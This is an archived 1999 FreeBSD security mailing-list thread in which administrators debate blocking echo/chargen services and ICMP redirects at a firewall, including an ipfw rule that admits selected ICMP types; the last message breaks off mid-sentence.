From owner-freebsd-security Sun Jan 17 01:43:24 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id BAA23450 for freebsd-security-outgoing; Sun, 17 Jan 1999 01:43:24 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from hotmail.com (f52.hotmail.com [207.82.250.63]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id BAA23445 for ; Sun, 17 Jan 1999 01:43:23 -0800 (PST) (envelope-from madrapour@hotmail.com) Received: (qmail 20053 invoked by uid 0); 17 Jan 1999 09:43:20 -0000 Message-ID: <19990117094320.20052.qmail@hotmail.com> Received: from 208.218.169.25 by www.hotmail.com with HTTP; Sun, 17 Jan 1999 01:43:20 PST X-Originating-IP: [208.218.169.25] From: "N. N.M" To: freebsd-security@FreeBSD.ORG Subject: Small Servers - ICMP Redirect Date: Sun, 17 Jan 1999 01:43:20 PST Mime-Version: 1.0 Content-Type: text/plain Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I have two security-related questions: 1) Might it be any problem in connectivity and services, if I block all traffic to (TCP/UDP) Small servers like echo, chargen, .... on firewall? 2) About ICMP redirect messages, as I learned they could be used to make our network disconnected and somthing. What's the way to prevent this kind of attack? Does blocking this kind of ICMP on firewall and routers cause any problem in connectivity and system behavior? Thanks in advance, Nazila N. ______________________________________________________ Get Your Private, Free Email at http://www.hotmail.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 11:59:34 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA21117 for freebsd-security-outgoing; Sun, 17 Jan 1999 11:59:34 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA21111 for ; Sun, 17 Jan 1999 11:59:33 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with ESMTP id OAA05652; Sun, 17 Jan 1999 14:59:26 -0500 (EST) Date: Sun, 17 Jan 1999 14:59:26 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: "N. N.M" cc: freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <19990117094320.20052.qmail@hotmail.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 17 Jan 1999, N. N.M wrote: > 1) Might it be any problem in connectivity and services, if I block all > traffic to (TCP/UDP) Small servers like echo, chargen, .... on firewall? Not a problem, go ahead. > 2) About ICMP redirect messages, as I learned they could be used to make > our network disconnected and somthing. What's the way to prevent this > kind of attack? Does blocking this kind of ICMP on firewall and routers > cause any problem in connectivity and system behavior? I would block these messages from entering my network, absolutely. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 12:29:05 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id MAA24506 for freebsd-security-outgoing; Sun, 17 Jan 1999 12:29:05 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from vital.bleeding.com (vital.bleeding.com [206.251.12.170]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id MAA24501 for ; Sun, 17 Jan 1999 12:29:04 -0800 (PST) (envelope-from jjwolf@bleeding.com) Received: from crimson ([144.254.195.2]) by vital.bleeding.com (8.8.8/8.8.8) with SMTP id MAA02925; Sun, 17 Jan 1999 12:37:09 -0800 (PST) (envelope-from jjwolf@bleeding.com) Message-ID: <007701be4256$f01ff740$02c3fe90@cisco.com> From: "Justin Wolf" To: , "N. N.M" Cc: Subject: Re: Small Servers - ICMP Redirect Date: Sun, 17 Jan 1999 12:20:45 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.0810.800 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0810.800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> 2) About ICMP redirect messages, as I learned they could be used to make >> our network disconnected and somthing. What's the way to prevent this >> kind of attack? Does blocking this kind of ICMP on firewall and routers >> cause any problem in connectivity and system behavior? > >I would block these messages from entering my network, absolutely. Keep in mind that flatly blocking all ICMP messages will prevent traces and pings both in and out of your network. It will also effect certain services... The best way to tailor this is to block everything and loosen it up as necessary to keep things from breaking. -Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 13:55:25 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA04750 for freebsd-security-outgoing; Sun, 17 Jan 1999 13:55:25 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from enya.clari.net.au (enya.clari.net.au [203.8.14.116]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA04745 for ; Sun, 17 Jan 1999 13:55:23 -0800 (PST) (envelope-from danny@enya.clari.net.au) Received: from localhost (danny@localhost) by enya.clari.net.au (8.8.8/8.8.7) with SMTP id IAA15305; Mon, 18 Jan 1999 08:54:45 +1100 (EST) (envelope-from danny@enya.clari.net.au) Date: Mon, 18 Jan 1999 08:54:45 +1100 (EST) From: "Daniel O'Callaghan" To: Justin Wolf cc: ben@rosengart.com, "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <007701be4256$f01ff740$02c3fe90@cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 17 Jan 1999, Justin Wolf wrote: > >> 2) About ICMP redirect messages, as I learned they could be used to make > >> our network disconnected and somthing. What's the way to prevent this > >> kind of attack? Does blocking this kind of ICMP on firewall and routers > >> cause any problem in connectivity and system behavior? > > > >I would block these messages from entering my network, absolutely. > > Keep in mind that flatly blocking all ICMP messages will prevent traces and > pings both in and out of your network. It will also effect certain > services... The best way to tailor this is to block everything and loosen > it up as necessary to keep things from breaking. It will also block useful things like source-quench. ICMP exists for a reason. Danny To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 13:56:42 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id NAA04845 for freebsd-security-outgoing; Sun, 17 Jan 1999 13:56:42 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id NAA04837 for ; Sun, 17 Jan 1999 13:56:38 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with ESMTP id QAA17471; Sun, 17 Jan 1999 16:56:19 -0500 (EST) Date: Sun, 17 Jan 1999 16:56:19 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: "Daniel O'Callaghan" cc: Justin Wolf , "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 18 Jan 1999, Daniel O'Callaghan wrote: > On Sun, 17 Jan 1999, Justin Wolf wrote: > > > >> 2) About ICMP redirect messages, as I learned they could be used to make > > >> our network disconnected and somthing. What's the way to prevent this > > >> kind of attack? Does blocking this kind of ICMP on firewall and routers > > >> cause any problem in connectivity and system behavior? > > > > > >I would block these messages from entering my network, absolutely. > > > > Keep in mind that flatly blocking all ICMP messages will prevent traces and > > pings both in and out of your network. It will also effect certain > > services... The best way to tailor this is to block everything and loosen > > it up as necessary to keep things from breaking. > > It will also block useful things like source-quench. ICMP exists for a > reason. Read the question again, people. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 14:13:31 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA07953 for freebsd-security-outgoing; Sun, 17 Jan 1999 14:13:31 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from vital.bleeding.com (vital.bleeding.com [206.251.12.170]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA07946 for ; Sun, 17 Jan 1999 14:13:29 -0800 (PST) (envelope-from jjwolf@bleeding.com) Received: from crimson ([144.254.195.2]) by vital.bleeding.com (8.8.8/8.8.8) with SMTP id OAA03126; Sun, 17 Jan 1999 14:21:36 -0800 (PST) (envelope-from jjwolf@bleeding.com) Message-ID: <001101be4265$88868540$02c3fe90@cisco.com> From: "Justin Wolf" To: , "Daniel O'Callaghan" Cc: "N. N.M" , Subject: Re: Small Servers - ICMP Redirect Date: Sun, 17 Jan 1999 14:05:12 -0800 MIME-Version: 1.0 Content-Type: text/plain; charset="Windows-1252" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.0810.800 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.0810.800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >> > >> 2) About ICMP redirect messages, as I learned they could be used to make >> > >> our network disconnected and somthing. What's the way to prevent this >> > >> kind of attack? Does blocking this kind of ICMP on firewall and routers >> > >> cause any problem in connectivity and system behavior? >> > > >> > >I would block these messages from entering my network, absolutely. >> > >> > Keep in mind that flatly blocking all ICMP messages will prevent traces and >> > pings both in and out of your network. It will also effect certain >> > services... The best way to tailor this is to block everything and loosen >> > it up as necessary to keep things from breaking. >> >> It will also block useful things like source-quench. ICMP exists for a >> reason. > >Read the question again, people. I believe I had read the question and that my response was applicable. Perhaps you should read the responses again? Blocking ICMP-redirects is definately advisable - I was suggesting that ICMP messages not be blocked on the whole. I appologize if my wording, or the wording of Daniel, is misleading... -Justin To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 14:35:33 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA11545 for freebsd-security-outgoing; Sun, 17 Jan 1999 14:35:33 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA11540 for ; Sun, 17 Jan 1999 14:35:32 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with ESMTP id RAA02975; Sun, 17 Jan 1999 17:35:17 -0500 (EST) Date: Sun, 17 Jan 1999 17:35:16 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: Justin Wolf cc: "Daniel O'Callaghan" , freebsd-security@FreeBSD.ORG, "N. N.M" Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <001101be4265$88868540$02c3fe90@cisco.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 17 Jan 1999, Justin Wolf wrote: > I believe I had read the question and that my response was applicable. > Perhaps you should read the responses again? Blocking ICMP-redirects is > definately advisable - I was suggesting that ICMP messages not be blocked on > the whole. I appologize if my wording, or the wording of Daniel, is > misleading... The question only concerned redirects. You're correct that blocking all ICMP is harmful, but I don't believe the original poster was considering that policy. On further reflection, I have one thing to add: it seems to me that redirects sent to the firewall router itself may or may not be trusted, depending whom you're talking to, but keeping them from entering your network is a good idea. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 14:42:29 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id OAA12457 for freebsd-security-outgoing; Sun, 17 Jan 1999 14:42:29 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from whistle.com (s205m131.whistle.com [207.76.205.131]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id OAA12452 for ; Sun, 17 Jan 1999 14:42:28 -0800 (PST) (envelope-from archie@whistle.com) Received: (from smap@localhost) by whistle.com (8.7.5/8.6.12) id OAA23529; Sun, 17 Jan 1999 14:41:18 -0800 (PST) Received: from bubba.whistle.com( 207.76.205.7) by whistle.com via smap (V2.0) id xma023525; Sun, 17 Jan 99 14:41:02 -0800 Received: (from archie@localhost) by bubba.whistle.com (8.8.7/8.6.12) id OAA21852; Sun, 17 Jan 1999 14:41:02 -0800 (PST) From: Archie Cobbs Message-Id: <199901172241.OAA21852@bubba.whistle.com> Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <007701be4256$f01ff740$02c3fe90@cisco.com> from Justin Wolf at "Jan 17, 99 12:20:45 pm" To: jjwolf@bleeding.com (Justin Wolf) Date: Sun, 17 Jan 1999 14:41:02 -0800 (PST) Cc: ben@rosengart.com, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL38 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Justin Wolf writes: > >> 2) About ICMP redirect messages, as I learned they could be used to make > >> our network disconnected and somthing. What's the way to prevent this > >> kind of attack? Does blocking this kind of ICMP on firewall and routers > >> cause any problem in connectivity and system behavior? > > > >I would block these messages from entering my network, absolutely. > > Keep in mind that flatly blocking all ICMP messages will prevent traces and > pings both in and out of your network. It will also effect certain > services... The best way to tailor this is to block everything and loosen > it up as necessary to keep things from breaking. This is the ICMP rule we generally use: ipfw add 10 allow icmp from any to any in icmptypes 0,3,4,11,12,14,16,18 This allows "safe" ICMP's to get in, so that ping, traceroute, etc. work, while blocking potentially unsafe ICMP's. See /sys/netinet/ip_icmp.h for definitions of the ICMP types. -Archie ___________________________________________________________________________ Archie Cobbs * Whistle Communications, Inc. * http://www.whistle.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 15:14:00 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA16946 for freebsd-security-outgoing; Sun, 17 Jan 1999 15:14:00 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA16910 for ; Sun, 17 Jan 1999 15:13:37 -0800 (PST) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.9.1/8.9.1) id SAA09685; Sun, 17 Jan 1999 18:09:14 -0500 (EST) (envelope-from wollman) Date: Sun, 17 Jan 1999 18:09:14 -0500 (EST) From: Garrett Wollman Message-Id: <199901172309.SAA09685@khavrinen.lcs.mit.edu> To: "Daniel O'Callaghan" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: References: <007701be4256$f01ff740$02c3fe90@cisco.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org < said: > It will also block useful things like source-quench. ICMP exists for a > reason. Actually, it will block useful things like `destination unreachable' and `fragmentation required'. Source Quench is not useful -- just ask any router vendor. As a general rule, you should accept all UNREACHABLE, TIME EXCEEDED, and PARAMETER PROBLEM messages, might or might not accept ECHO REQUEST and ECHO RESPONSE, and should drop all others. -GAWollman -- Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same wollman@lcs.mit.edu | O Siem / The fires of freedom Opinions not those of| Dance in the burning flame MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 15:51:30 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA22755 for freebsd-security-outgoing; Sun, 17 Jan 1999 15:51:30 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from oreo.adsu.bellsouth.com (oreo.adsu.bellsouth.com [205.152.173.36]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA22748 for ; Sun, 17 Jan 1999 15:51:28 -0800 (PST) (envelope-from ck@oreo.adsu.bellsouth.com) Received: (from ck@localhost) by oreo.adsu.bellsouth.com (8.9.1/8.9.1) id SAA97364; Sun, 17 Jan 1999 18:50:47 -0500 (EST) (envelope-from ck) Date: Sun, 17 Jan 1999 18:50:47 -0500 From: Christian Kuhtz To: "Daniel O'Callaghan" Cc: Justin Wolf , ben@rosengart.com, "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect Message-ID: <19990117185047.A97318@oreo.adsu.bellsouth.com> References: <007701be4256$f01ff740$02c3fe90@cisco.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Daniel O'Callaghan on Mon, Jan 18, 1999 at 08:54:45AM +1100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, Jan 18, 1999 at 08:54:45AM +1100, Daniel O'Callaghan wrote: > On Sun, 17 Jan 1999, Justin Wolf wrote: > > Keep in mind that flatly blocking all ICMP messages will prevent traces and > > pings both in and out of your network. It will also effect certain > > services... The best way to tailor this is to block everything and loosen > > it up as necessary to keep things from breaking. > > It will also block useful things like source-quench. ICMP exists for a > reason. With all due respect, ICMP source quenches are in my experience not a regular occurance (even though it'd be nice to get them more frequently) and even if they occur, most stacks don't know how to deal with it correctly. ICMP is primarily a diagnostic tool. In a properly configured network, ICMP is not neccessary. Again, loosen your configs as needed. A lack of ICMP in a properly configured network is irritating at best, but not life threatening. Cheers, Chris -- "We are not bound by any concept, we are just bound to make any concept work better than others." -- Dr. Ferry Porsche [Disclaimer: I speak for myself and my views are my own and not in any way to be construed as the views of BellSouth Corporation. ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 15:56:03 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id PAA23586 for freebsd-security-outgoing; Sun, 17 Jan 1999 15:56:03 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from oreo.adsu.bellsouth.com (oreo.adsu.bellsouth.com [205.152.173.36]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id PAA23509 for ; Sun, 17 Jan 1999 15:56:00 -0800 (PST) (envelope-from ck@oreo.adsu.bellsouth.com) Received: (from ck@localhost) by oreo.adsu.bellsouth.com (8.9.1/8.9.1) id SAA97420; Sun, 17 Jan 1999 18:55:43 -0500 (EST) (envelope-from ck) Date: Sun, 17 Jan 1999 18:55:43 -0500 From: Christian Kuhtz To: Garrett Wollman Cc: "Daniel O'Callaghan" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect Message-ID: <19990117185543.C97318@oreo.adsu.bellsouth.com> References: <007701be4256$f01ff740$02c3fe90@cisco.com> <199901172309.SAA09685@khavrinen.lcs.mit.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <199901172309.SAA09685@khavrinen.lcs.mit.edu>; from Garrett Wollman on Sun, Jan 17, 1999 at 06:09:14PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Jan 17, 1999 at 06:09:14PM -0500, Garrett Wollman wrote: > Actually, it will block useful things like `destination unreachable' > and `fragmentation required'. Source Quench is not useful -- just ask > any router vendor. Yep. Like the frame-relay FECN/BECN. > As a general rule, you should accept all UNREACHABLE, TIME EXCEEDED, > and PARAMETER PROBLEM messages, might or might not accept ECHO > REQUEST and ECHO RESPONSE, and should drop all others. It should be pointed out, though, that nothing gets broken when those are blocked. The rest is religion and should be discussed on firewalls@greatcircle.com Thanks, Chris -- "We are not bound by any concept, we are just bound to make any concept work better than others." -- Dr. Ferry Porsche [Disclaimer: I speak for myself and my views are my own and not in any way to be construed as the views of BellSouth Corporation. ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 16:27:47 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA00594 for freebsd-security-outgoing; Sun, 17 Jan 1999 16:27:47 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA00589 for ; Sun, 17 Jan 1999 16:27:46 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost by echonyc.com (8.9.1/8.9.1) with ESMTP id TAA06919; Sun, 17 Jan 1999 19:27:30 -0500 (EST) Date: Sun, 17 Jan 1999 19:27:30 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: Christian Kuhtz cc: "Daniel O'Callaghan" , Justin Wolf , ben@rosengart.com, "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect In-Reply-To: <19990117185047.A97318@oreo.adsu.bellsouth.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, 17 Jan 1999, Christian Kuhtz wrote: > With all due respect, ICMP source quenches are in my experience not a regular > occurance (even though it'd be nice to get them more frequently) and even if > they occur, most stacks don't know how to deal with it correctly. > > ICMP is primarily a diagnostic tool. In a properly configured network, ICMP > is not neccessary. Again, loosen your configs as needed. A lack of ICMP > in a properly configured network is irritating at best, but not life > threatening. I disagree. ICMP is *required* for Solaris' path MTU discovery, for host unreachable messages, and for UDP port unreachables. There are probably serveral other applications that break without ICMP. ICMP is not optional, it's part of the Internet Protocol. I agree about source quenches though. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 16:31:09 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA01027 for freebsd-security-outgoing; Sun, 17 Jan 1999 16:31:09 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA01019 for ; Sun, 17 Jan 1999 16:31:06 -0800 (PST) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.1/8.9.1) id QAA54407; Sun, 17 Jan 1999 16:30:56 -0800 (PST) (envelope-from dillon) Date: Sun, 17 Jan 1999 16:30:56 -0800 (PST) From: Matthew Dillon Message-Id: <199901180030.QAA54407@apollo.backplane.com> To: Christian Kuhtz Cc: "Daniel O'Callaghan" , Justin Wolf , ben@rosengart.com, "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect References: <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :With all due respect, ICMP source quenches are in my experience not a regular :occurance (even though it'd be nice to get them more frequently) and even if :they occur, most stacks don't know how to deal with it correctly. : :ICMP is primarily a diagnostic tool. In a properly configured network, ICMP :is not neccessary. Again, loosen your configs as needed. A lack of ICMP :in a properly configured network is irritating at best, but not life :threatening. : :Cheers, :Chris ICMP is definitely not just a diagnostic tool, and it is put to good use in a properly configured network. For example, Path MTU Discovery uses ICMP ( RFC 1191 ). ICMP is not something you want to arbitrarily filter. At the very least you want to let through the various unreachability messages. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 16:47:45 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA04045 for freebsd-security-outgoing; Sun, 17 Jan 1999 16:47:45 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from oreo.adsu.bellsouth.com (oreo.adsu.bellsouth.com [205.152.173.36]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA04038 for ; Sun, 17 Jan 1999 16:47:43 -0800 (PST) (envelope-from ck@oreo.adsu.bellsouth.com) Received: (from ck@localhost) by oreo.adsu.bellsouth.com (8.9.1/8.9.1) id TAA97885; Sun, 17 Jan 1999 19:47:06 -0500 (EST) (envelope-from ck) Date: Sun, 17 Jan 1999 19:47:06 -0500 From: Christian Kuhtz To: Matthew Dillon Cc: Christian Kuhtz , "Daniel O'Callaghan" , Justin Wolf , ben@rosengart.com, "N. N.M" , freebsd-security@FreeBSD.ORG Subject: Re: Small Servers - ICMP Redirect Message-ID: <19990117194706.H97318@oreo.adsu.bellsouth.com> References: <007701be4256$f01ff740$02c3fe90@cisco.com> <19990117185047.A97318@oreo.adsu.bellsouth.com> <199901180030.QAA54407@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: <199901180030.QAA54407@apollo.backplane.com>; from Matthew Dillon on Sun, Jan 17, 1999 at 04:30:56PM -0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Jan 17, 1999 at 04:30:56PM -0800, Matthew Dillon wrote: > ICMP is definitely not just a diagnostic tool, and it is put to good use > in a properly configured network. For example, Path MTU Discovery > uses ICMP ( RFC 1191 ). ICMP is not something you want to arbitrarily > filter. At the very least you want to let through the various > unreachability messages. #ifndef _RUNAWAY_-CURRENT_THREAD Nothing is broken by not getting host unreachable messages. Nothing breaks by not permitting traceroutes (port unreachable et al). Sure, path MTU discovery according to RFC1191 is nice, but not vital. Argueably, there are other much bigger bottlenecks over WANs (at the edge of which firewalls are typically used) than suboptimal MRUs. Many service providers filter and/or rate limit ICMP messages (to prevent SMURF amplification et al to cause havoc to their infrastructures). To build applications which _rely exclusively_ on ICMP to work is close to grossly negligent. Those that do are primarily diagnostic applications. I didn't say ICMP is an optional component of IP. This was in the context of firewalls. Some schools of firewall design insist that only absolutely required traffic pass the firewall. As such, turning ICMP off at the firewall is perhaps not the prettiest or whatever way to do it, but it certainly prevents the various exploits based on ICMP. #endif /* _RUNAWAY_-CURRENT_THREAD */ There is no such thing as a free lunch. Security doesn't come without a price. In fact, I am required to trade slight performance and convenience for security. And so are many others. That is where the question and my response originated. If you aren't part of that group... use IP to the fullest and ignore this thread. Cheers, Chris -- "We are not bound by any concept, we are just bound to make any concept work better than others." -- Dr. Ferry Porsche [Disclaimer: I speak for myself and my views are my own and not in any way to be construed as the views of BellSouth Corporation. ] To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Jan 17 16:50:13 1999 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id QAA04454 for freebsd-security-outgoing; Sun, 17 Jan 1999 16:50:13 -0800 (PST) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from wrath.cs.utah.edu (wrath.cs.utah.edu [155.99.198.100]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id QAA04415 for ; Sun, 17 Jan 1999 16:50:07 -0800 (PST) (envelope-from danderse@cs.utah.edu) Received: from lal.cs.utah.edu (lal.cs.utah.edu [155.99.195.65]) by wrath.cs.utah.edu (8.8.8/8.8.8) with ESMTP id RAA12959; Sun, 17 Jan 1999 17:50:02 -0700 (MST) From: David G Andersen Received: (from danderse@localhost) by lal.cs.utah.edu (8.8.8/8.8.8) id RAA16892; Sun, 17 Jan 1999 17:51:06 -0700 (MST) Message-Id: <199901180051.RAA16892@lal.cs.utah.edu> Subject: Re: Small Servers - ICMP Redirect To: ck@adsu.bellsouth.com (Christian Kuhtz) Date: Sun, 17 Jan 1999 17:51:06 -0700 (MST) Cc: danny@hilink.com.au, jjwolf@bleeding.com, ben@rosengart.com, madrapour@hotmail.com, freebsd-security@FreeBSD.ORG In-Reply-To: <19990117185047.A97318@oreo.adsu.bellsouth.com> from "Christian Kuhtz" at Jan 17, 99 06:50:47 pm X-Mailer: ELM [version 2.4 PL25] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Lo and behold, Christian Kuhtz once said: > > ICMP is primarily a diagnostic tool. In a properly configured network, ICMP > is not neccessary. Again, loosen your configs as needed. A lack of ICMP > in a properly configured network is irritating at best, but not life > threatening. This is actually 